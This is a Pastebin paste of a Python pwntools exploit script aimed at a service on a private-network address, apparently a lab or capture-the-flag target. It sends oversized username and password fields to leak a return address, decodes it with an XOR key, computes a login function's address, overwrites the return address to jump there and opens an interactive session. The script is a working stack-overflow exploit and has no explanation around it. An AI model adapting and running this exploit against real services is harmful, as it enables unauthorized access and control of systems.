Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- import struct
- conn = remote('192.168.56.104',6642)
- data = ''
- username = ''
- password = ''
- def xoraddr(addr,val):
- result = '0x'+''.join([hex(int("0x"+addr[x:x+2],16) ^ val)[2::] for x in xrange(0,len(addr),2) if x != 0])
- return result
- val = 0x03
- i = 3
- while(i > 0):
- if i == 3:
- username = "A" *32
- password = "B" *32
- val = 0x03
- if i == 2:
- username = "A"*20+p32(int(unxored_leak,16))+"A"*8
- password = "B"*20+p32(int(unxored_login,16))+"B"*8
- if i == 1:
- conn.interactive()
- print conn.readuntil("Enter your username:")
- log.info("Sending %s username",username)
- time.sleep(1)
- conn.sendline(username)
- print conn.readuntil("Enter your password:")
- log.info("Sending %s password",password)
- conn.sendline(password)
- time.sleep(1)
- data = conn.readuntil('\n')
- if len(data) >=120:
- ret = data[116:120]
- if i == 3:
- log.info("Leaked code section => RET %s:", hex(u32(ret)))
- unxored_leak = xoraddr(hex(u32(ret)),val)
- log.info("Unxored leak RET: %s",unxored_leak)
- unxored_login = xoraddr(hex(int(unxored_leak,16)-1162),val)
- log.info("Unxored login addr %s",unxored_login)
- i -= 1
- conn.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement